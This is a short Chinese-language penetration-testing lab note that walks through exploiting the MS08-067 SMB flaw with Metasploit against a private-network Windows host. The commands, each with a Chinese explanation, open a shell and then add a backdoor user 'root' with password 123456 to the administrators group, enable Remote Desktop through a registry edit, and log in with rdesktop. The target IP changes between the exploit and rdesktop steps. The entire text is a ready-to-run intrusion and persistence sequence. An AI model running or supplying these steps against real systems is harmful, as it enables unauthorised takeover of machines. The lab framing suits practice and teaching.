渗透实验1

msf > search ms08-067
搜索ms08-067相关漏洞的攻击模块

msf > use exploit/windows/smb/ms08_067_netapi
使用刚才搜索到的漏洞

msf exploit(ms08_067_netapi) > set rhost 192.168.191.129
设置要攻击的目标主机ip

msf exploit(ms08_067_netapi) > exploit
发起攻击

meterpreter > shell
对目标主机进行命令行控制

C:\WINDOWS\system32>
C:\WINDOWS\system32>net user root 123456 /add
给自己创建1个新用户，root，密码123456

C:\WINDOWS\system32>net localgroup administrators root /add
给自己的用户提权，加入管理员组

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
通过编辑注册表，开启目标主机的远程桌面功能

[email protected]:~# rdesktop -a 16 192.168.147.131
另外开1个窗口，通过远程桌面登录目标主机